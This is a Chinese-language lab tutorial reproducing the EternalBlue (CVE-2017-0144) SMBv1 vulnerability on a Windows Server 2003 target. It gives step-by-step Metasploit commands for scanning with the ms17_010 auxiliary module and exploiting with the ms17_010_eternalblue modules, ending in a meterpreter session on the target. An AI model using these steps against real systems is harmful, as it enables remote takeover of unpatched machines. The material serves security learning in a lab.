一.简介
CVE-2017-0144 即永恒之蓝,最早爆发于2017年4月14日晚,它是在Windows系统的SMB服务处理SMB v1请求时发生的漏洞,这个漏洞导致攻击者在目标系统上获取了最高权限,可以执行任意代码。通过永恒之蓝漏洞会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。
二.环境准备
靶机:Windows Server 2003
攻击机:Kali (自带 Metasploit)
三.复现过程
1. 关闭靶机的防火墙。(这里我的Windows版本可能跟你不同,但是位置一般差不多,在设置里搜索一下就可以找到)
2. 开启靶机的SMB服务(网上邻居 -> 属性)
点击 高级 -> 选择 高级设置 -> 开启 文件和打印机共享。(不同版本略有区别,一般都在 高级共享设置 里可以找到)
3. 开启 Kali ,输入命令 msfconsole ,启动 Metasploit 。
4. 输入命令,查看一下有关 永恒之蓝 漏洞的模块。
search ms17_010
有四个模块,前两个是漏洞利用模块,后两个是辅助模块,用于扫描漏洞。
5. 我们使用最后一个,先确定一下靶机是否存在永恒之蓝漏洞。
use auxiliary/scanner/smb/smb_ms17_010
6. 输入命令 options ,查看一下需要设置哪些参数,yes 表示需要我们自己设置,(有默认参数时可以不设置,也可以选择自己修改),no 表示不需要我们自己设置。
这里我们只需要设置 RHOSTS ,另外三个我们就不设置了,默认当前的设置就可以了。
7. RHOSTS 可以是一个确定的 ip 地址,也可以是一个 ip 地址的范围,如果确定了靶机的 ip 地址,就直接扫描一个确定的地址就可以了。
首先,在靶机上看一下 ip 地址是多少,输入命令 ipconfig 。
然后,就开始设置,在 Kali 上输入命令设置 RHOSTS 参数。
set rhosts 靶机的ip地址
8. 输入 run ,开始扫描。(有绿色标识符就说明有这个漏洞可以利用)
9. 进入漏洞利用模块,也就是刚刚搜索出来的四个模块,我们先用第一个模块来试试。
use exploit/windows/smb/ms17_010_eternalblue
然后 查看参数。
10. 这里跟上面一样,只需要设置 RHOSTS 。
11. 输入 run 。发现型号不匹配,没关系,换第二个模块。
12. 操作同上。到此为止,我们就拿到 meterpreter ,说明漏洞利用成功了。
13. 我们已经控制了靶机,接着就可以执行我们想要的任何命令了。